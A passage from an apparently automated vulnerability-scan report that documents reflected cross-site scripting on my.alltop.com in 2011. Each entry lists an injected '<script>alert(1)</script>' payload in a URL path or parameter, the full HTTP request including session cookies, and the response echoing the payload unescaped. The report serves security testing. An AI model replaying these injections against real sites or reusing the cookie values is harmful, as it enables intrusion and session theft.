<form action="/alpha/p?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000181)%3C/script%3E20c29"><script>alert(1)</script>130d5be8299" method="post" accept-charset="utf-8">
...[SNIP]...

1.190. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e681"><script>alert(1)</script>41158ba707c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C5e681"><script>alert(1)</script>41158ba707c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:06 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C5e681"><script>alert(1)</script>41158ba707c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.191. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65068"><script>alert(1)</script>942fd3f40ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C65068"><script>alert(1)</script>942fd3f40ac/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C65068"><script>alert(1)</script>942fd3f40ac/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.192. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e3b1"><script>alert(1)</script>00c095fb0f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C1e3b1"><script>alert(1)</script>00c095fb0f4/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C1e3b1"><script>alert(1)</script>00c095fb0f4/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.193. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb612"><script>alert(1)</script>76cc28d114 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3Efb612"><script>alert(1)</script>76cc28d114 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3Efb612"><script>alert(1)</script>76cc28d114" method="post" accept-charset="utf-8">
...[SNIP]...

1.194. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc52e"><script>alert(1)</script>108b51fe189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E?dc52e"><script>alert(1)</script>108b51fe189=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:04 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:04 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E?dc52e"><script>alert(1)</script>108b51fe189=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.195. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%22ns=%22netsparker(0x0001EE)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a9"><script>alert(1)</script>9cded373049 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p9f1a9"><script>alert(1)</script>9cded373049/%22ns=%22netsparker(0x0001EE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p9f1a9"><script>alert(1)</script>9cded373049/%22ns=%22netsparker(0x0001EE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.196. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%22ns=%22netsparker(0x0001EE)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23248"><script>alert(1)</script>0895e4eb460 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%22ns23248"><script>alert(1)</script>0895e4eb460=%22netsparker(0x0001EE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%22ns23248"><script>alert(1)</script>0895e4eb460=%22netsparker(0x0001EE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.197. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%22ns=%22netsparker(0x0001EE)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b2b2"><script>alert(1)</script>e7c4c41d0bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%22ns=%22netsparker(0x0001EE)?8b2b2"><script>alert(1)</script>e7c4c41d0bd=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
